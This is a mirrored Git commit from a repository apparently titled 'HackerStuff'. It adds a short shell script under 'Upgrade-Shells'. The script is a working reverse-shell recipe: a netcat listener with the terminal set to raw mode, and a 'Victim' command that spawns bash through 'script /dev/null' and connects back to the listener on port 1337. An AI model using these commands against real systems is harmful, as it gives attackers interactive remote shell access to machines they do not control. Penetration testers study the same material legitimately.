mirror of
https://github.com/0xdade/HackerStuff.git
synced 2025-10-29 16:59:27 +00:00
Create using-script.sh
This commit is contained in:
parent
49835eed58
commit
590fcc5bad
5
Upgrade-Shells/using-script.sh
Normal file
5
Upgrade-Shells/using-script.sh
Normal file
@ -0,0 +1,5 @@
|
|||||||
|
# Listener
|
||||||
|
stty -echo raw ; nc -lp 1337; stty sane
|
||||||
|
|
||||||
|
# Victim
|
||||||
|
nc -c '/bin/bash -c "script /dev/null"' listener 1337
|
||||||
Loading…
x
Reference in New Issue
Block a user